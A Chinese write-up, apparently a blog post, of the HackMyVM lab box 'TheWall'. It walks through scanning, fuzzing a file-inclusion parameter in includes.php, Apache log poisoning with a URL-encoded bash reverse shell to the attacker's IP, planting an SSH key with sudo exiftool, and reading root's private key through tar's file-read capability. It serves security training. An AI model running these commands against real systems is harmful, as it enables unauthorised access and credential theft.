当前位置: 首页 > news >正文

HakcMyVM -TheWall

news 2025/6/7 6:23:09

信息搜集

主机发现

┌──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.21.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-06 04:19 EDT
Nmap scan report for 192.168.21.1
Host is up (0.0024s latency).
MAC Address: CC:E0:DA:EB:34:A2 (Baidu Online Network Technology (Beijing))
Nmap scan report for 192.168.21.4
Host is up (0.086s latency).
MAC Address: E2:F1:73:FE:8C:B0 (Unknown)
Nmap scan report for 192.168.21.5
Host is up (0.00026s latency).
MAC Address: 04:6C:59:BD:33:50 (Intel Corporate)
Nmap scan report for 192.168.21.7
Host is up (0.00036s latency).
MAC Address: 08:00:27:C2:0B:02 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.21.6
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.84 seconds

端口扫描

┌──(kali㉿kali)-[~]
└─$ nmap --min-rate 10000 -p- 192.168.21.7  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-06 04:20 EDT
Nmap scan report for 192.168.21.7
Host is up (0.000074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:C2:0B:02 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds┌──(kali㉿kali)-[~]
└─$ nmap -sU --min-rate 10000 -p- 192.168.21.7  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-06 04:21 EDT
Warning: 192.168.21.7 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.21.7
Host is up (0.0015s latency).
All 65535 scanned ports on 192.168.21.7 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 08:00:27:C2:0B:02 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 73.03 seconds┌──(kali㉿kali)-[~]
└─$ nmap -sT -sV -O -p22,80 192.168.21.7      
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-06 04:22 EDT
Nmap scan report for 192.168.21.7
Host is up (0.00028s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
MAC Address: 08:00:27:C2:0B:02 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds

漏洞扫描

┌──(kali㉿kali)-[~]
└─$ nmap --script=vuln -p22,80 192.168.21.7
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-06 04:24 EDT
Nmap scan report for 192.168.21.7
Host is up (0.00047s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 08:00:27:C2:0B:02 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 36.75 seconds

漏洞利用

看一下80端口

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.21.7                
<h1>Forbidden</h1>

目录扫描,应该是做了限制,我们限制一下速率。~太慢太慢了,我直接看的wp。index.php和includes.php

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.21.7 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --delay 1s -t 1

/index.php

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.21.7/index.php<h1>HELLO WORLD!</h1>

/includes.php什么也没有,尝试模糊测试,存在文件包含漏洞

┌──(kali㉿kali)-[~]
└─$ ffuf -u "http://192.168.21.7/includes.php?FUZZ=/etc/passwd" -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -fc 403 -c -fs 0,2 -s
display_page
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.21.7/includes.php?display_page=/etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:104:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
john:x:1000:1000:,,,:/home/john:/bin/bash
systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin

image

尝试反弹个shell:/includes.php?display_page=/var/log/apache2/access.log&1=bash%20-c%20%27bash%20-i%20>%26%20%2Fdev%2Ftcp%2F192.168.21.6%2F1234%20%200>%261%27

image

权限提升

看一下有什么

www-data@TheWall:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on TheWall:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser www-data may run the following commands on TheWall:(john : john) NOPASSWD: /usr/bin/exiftool
www-data@TheWall:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/sudo
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/su
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
www-data@TheWall:/var/www/html$ /usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
www-data@TheWall:/var/www/html$ cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:,,,:/home/john:/bin/bash

在这里插入图片描述

提权

www-data@TheWall:/tmp$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIyH4b8Zoyqq3/IPn4Qg65OisygTuQuahWV9qPm5YovJ kali@kali" > /tmp/key
<Pn4Qg65OisygTuQuahWV9qPm5YovJ kali@kali" > /tmp/key
www-data@TheWall:/tmp$ sudo -u john /usr/bin/exiftool -filename=/home/john/.ssh/authorized_keys /tmp/key   
< -filename=/home/john/.ssh/authorized_keys /tmp/key
Warning: Error removing old file - /tmp/key1 image files updated
┌──(kali㉿kali)-[~/.ssh]
└─$ ssh john@192.168.21.15 -i id_ed25519 
The authenticity of host '192.168.21.15 (192.168.21.15)' can't be established.
ED25519 key fingerprint is SHA256:Ew2srZtokZQDN/Tw8xKgD2oEnd4Cgyo+aGT0drkNYQc.
This host key is known by the following other names/addresses:~/.ssh/known_hosts:12: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.21.15' (ED25519) to the list of known hosts.
Linux TheWall 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 19 17:07:17 2022 from 10.0.2.15
john@TheWall:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(bluetooth)

看一下都有什么

john@TheWall:~$ ls -la
total 32
drwxr-xr-x 4 john john 4096 Oct 19  2022 .
drwxr-xr-x 3 root root 4096 Oct 17  2022 ..
lrwxrwxrwx 1 john john    9 Oct 19  2022 .bash_history -> /dev/null                                                             
-rw-r--r-- 1 john john  220 Oct 17  2022 .bash_logout
-rw-r--r-- 1 john john 3526 Oct 17  2022 .bashrc
drwxr-xr-x 3 john john 4096 Oct 19  2022 .local
-rw-r--r-- 1 john john  807 Oct 17  2022 .profile
drwx------ 2 john john 4096 Jun  6 17:57 .ssh
-rw-r--r-- 1 john john   33 Oct 19  2022 user.txt
john@TheWall:~$ sudo -l
-bash: sudo: command not found
john@TheWall:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/sudo
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/su
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
john@TheWall:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep

user

john@TheWall:~$ cat user.txt 
cc5db5e7b0a26e807765f47a006f6221

没发现什么能利用的地方,传一个脚本看看

image

tar可以先创建tar然后再解压读取

john@TheWall:~$ ls -la /id_rsa
-rw------- 1 root root 2602 Oct 19  2022 /id_rsa
john@TheWall:~$ /usr/sbin/tar -czf 1.tar.gz /id_rsa
/usr/sbin/tar: Removing leading `/' from member names
john@TheWall:~$ /usr/sbin/tar -xvf 1.tar.gz
id_rsa
john@TheWall:~$ chmod 600 id_rsa
john@TheWall:~$ ssh root@127.0.0.1 -i id_rsa 
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:B5rYCjLqqIAUNVd/dSEQtCZrIoOVYpYzqn/4r2fvE/U.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Linux TheWall 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 19 19:51:15 2022 from 10.0.2.15
root@TheWall:~# id
uid=0(root) gid=0(root) groups=0(root)

root

root@TheWall:~# cat r0Ot.txT 
4be82a3be9aed6eea5d0cce68e17662e
http://www.xdnf.cn/news/903817.html

相关文章:

  • 初识AI Agent
  • 面向开发者的提示词工程④——文本推断(Inferring)
  • 数学建模期末速成 聚类分析与判别分析
  • Caliper 配置文件解析:fisco-bcos.json
  • 【计算机组成原理 第5版】白、戴编著 第六章 总线系统 课后题总结
  • 大模型安全测试报告:千问、GPT 全系列、豆包、Claude 表现优异,DeepSeek、Grok-3 与 Kimi 存在安全隐患
  • LabVIEW工业级多任务实时测控系统
  • ComfyUI 文生图教程,进行第一次的图片生成
  • 连续小波变换(Continuous Wavelet Transform, CWT)
  • 【HarmonyOS 5】出行导航开发实践介绍以及详细案例
  • Spring Boot实现接口时间戳鉴权
  • ABAP设计模式之---“简单设计原则(Simple Design)”
  • Windows无限期暂停更新
  • 模板方法模式:优雅封装不变,灵活扩展可变
  • web3-基于贝尔曼福特算法(Bellman-Ford )与 SMT 的 Web3 DeFi 套利策略研究
  • 贝叶斯深度学习!华科大《Nat. Commun.》发表BNN重大突破!
  • Science Robotics:UCLA 贺曦敏团队综述自主软体机器人
  • dexcap升级版之DexWild——面向户外环境的灵巧手交互策略:人类和机器人演示协同训练(人类直接带上动捕手套采集数据)
  • 【Linux 学习计划】-- 简易版shell编写
  • 【大模型LLM学习】Flash-Attention的学习记录
  • 阿里140 补环境日志
  • 华为 “一底双长焦” 专利公布,引领移动影像新变革
  • Caliper 负载(Workload)详细解析
  • 【NLP中向量化方式】序号化,亚编码,词袋法等
  • MySQL数据库基础(二)———数据表管理
  • 安卓基础(生成APK)
  • React 第五十六节 Router 中useSubmit的使用详解及注意事项
  • next,react封装axios,http请求
  • ✅ 常用 Java HTTP 客户端汇总及使用示例
  • 【零基础 快速学Java】韩顺平 零基础30天学会Java[学习笔记]